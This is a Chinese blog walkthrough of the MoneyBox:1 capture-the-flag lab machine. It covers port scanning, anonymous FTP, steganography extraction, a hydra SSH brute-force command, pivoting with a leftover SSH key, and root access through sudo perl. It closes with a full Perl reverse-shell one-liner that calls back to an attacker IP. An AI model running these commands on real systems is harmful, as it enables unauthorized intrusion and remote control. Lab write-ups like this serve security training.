MoneyBox:1 靶机

于 2024-06-04 20:27:40 发布
阅读量253 收藏 5
点赞数 4
分类专栏: 靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lx_Zyu/article/details/139453004
版权

信息收集

Difficulty : Easy

Goal : 3 flags(3个旗帜)

MAC地址:00:0C:29:D1:37:19

ip扫描

端口探测

发现ftp可以匿名登录

并且探测到里面有一个图片 

└─$ sudo nmap -A -p- -sS -sC -T4 10.10.1.67
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-02 16:24 CST
Nmap scan report for bogon (10.10.1.67)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.1.50
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e30ce7281e0a23d5c28888b12acfaac (RSA)
|   256 019dfafbf20637c012fc018b248f53ae (ECDSA)
|_  256 2f34b3d074b47f8d17d237b12e32f7eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:D1:37:19 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.18 ms bogon (10.10.1.67)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.94 seconds

渗透过程

ftp连接

ftp常见匿名账户密码anonymous anonymous

get下载到本地

打开是只喵在玩电脑(~喵)

这个图片里面有隐写

使用工具steghide查看其隐写

发现需要密码

这个端口就先搁置

看其他两个端口

访问80

扫描目录

dirsearch -u 10.10.1.67

有一个重定向链接

发现在其源码下有个秘密目录

the hint is the another secret directory is S3cr3t-T3xt

..Secret Key 3xtr4ctd4t4

有个密钥

可能是图片的那个密码

提取出来

steghide extract -sf trytofind.jpg

cat data.txt文件

说有一个用户renu

他的密码太弱了

然后尝试爆破

尝试使用九头蛇(hydra)爆破

hydra ssh://10.10.1.67 -l renu -P /home/kali/zidian/top1000.txt -vV -f -t 32

连接ssh并找到了第一个flag

看一下历史命令

history

发现执行过这些命令

ssh-keygen -t rsa        生成RSA类型的SSH密钥。

ssh-copy-id lily@192.168.43.80        将公钥复制到远程服务器上,以便进行无密码SSH登录。

chmod 400 id_rsa        更改id_rsa文件的权限为400,也就是只有文件所有者可以读取该文件。

ssh -i id_rsa lily@192.168.43.80       使用指定的密钥文件(id_rsa)通过SSH连接到远程服务器。

尝试ssh lily@192.168.43.80,发现不能登录,再仔细看看它进入了家目录在进入lily,说明机器上也有一个lily用户,所以尝试用127.0.0.1替换192.168.43.80

可以看到第二个flag在user2.txt文件下

查看一下sudo -l

有个prel

提权 shell反弹

sudo perl -e 'use Socket;$i="10.10.1.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

第三个flag已找到

到此结束

lx_Zyu
关注
专栏目录
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值